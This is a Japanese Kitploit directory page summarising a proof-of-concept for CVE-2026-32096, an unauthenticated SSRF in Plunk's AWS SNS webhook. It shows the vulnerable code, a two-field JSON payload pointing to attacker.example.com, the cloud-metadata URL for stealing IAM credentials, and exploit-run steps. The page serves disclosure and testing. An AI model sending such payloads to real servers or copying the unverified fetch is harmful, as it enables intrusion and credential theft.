Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-32096 — PlunkのSNSウェブフックにおけるSSRF脆弱性の概念実証エクスプロイトであり、検証されていないSubscribeURLを介した未認証のサーバーサイドリクエストフォージェリを実証します。 | Kitploit
ツール/GitHubGitHub/andrebhu/cve-2026-32096
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubandrebhu/cve-2026-32096

CVE-2026-32096

PlunkのSNSウェブフックにおけるSSRF脆弱性の概念実証エクスプロイトであり、検証されていないSubscribeURLを介した未認証のサーバーサイドリクエストフォージェリを実証します。

リポジトリを見る
5ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-32096

useplunk/plunk における未検証の AWS SNS SubscriptionConfirmation を介した SSRF

概要

Plunk の API エンドポイント POST /webhooks/sns は、AWS SNS の暗号署名を検証せずに、攻撃者が指定した SubscribeURL を取得します。認証されていない攻撃者は、サーバーに任意の外部送信 HTTP リクエスト (SSRF) を強制できます。

深刻度Critical — CVSS 9.3 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N)
CWECWE-918: Server-Side Request Forgery
影響を受けるファイルapps/api/src/controllers/Webhooks.ts
認証の必要性なし

脆弱なコード

root@kitploit:~
// apps/api/src/controllers/Webhooks.ts
if (req.body.Type === 'SubscriptionConfirmation') {
  const confirmResponse = await fetch(req.body.SubscribeURL); // SSRF — 署名検証なし
  if (confirmResponse.ok) {
    return res.status(200).json({ success: true, message: 'Subscription confirmed' });
  }
}

最小限のペイロードは、次の 2 つのフィールドのみです:

root@kitploit:~
{
  "Type": "SubscriptionConfirmation",
  "SubscribeURL": "http://attacker.example.com/callback"
}

影響

  • AWS EC2/ECS: http://169.254.169.254/latest/meta-data/iam/security-credentials/ を介して IAM 認証情報を窃取
  • 内部サービス: データベース、Redis、Kubernetes API、その他のインターネットに公開されていないサービスに到達
  • ポートスキャン: タイミングおよびエラーベースの応答を介して内部ポートを列挙

再現手順

前提条件

  • Docker & Docker Compose
  • Python 3

手順

  1. Plunk テスト環境を起動:

    root@kitploit:~
    docker compose up -d
    
  2. SSRF コールバックリスナーを起動:

    root@kitploit:~
    python3 listener.py
    
  3. エクスプロイトを実行:

    root@kitploit:~
    chmod +x exploit.sh
    ./exploit.sh
    
  4. listener.py の出力でコールバックのヒットを確認し、サーバーが攻撃者制御の URL を取得したことを確認します。

ファイル

ファイル説明
exploit.shエンドツーエンドのエクスプロイトスクリプト — 偽造された SNS ペイロードを脆弱なエンドポイントに送信
listener.pySSRF コールバックリスナー — Plunk サーバーからの受信リクエストをキャプチャしてログに記録
docker-compose.ymlローカル再現用の最小限の Docker Compose 環境 (Postgres、Redis、Plunk)

参考情報

  • AWS SNS: Amazon SNS メッセージの署名の検証
  • OWASP SSRF 防止チートシート
ツールをダウンロード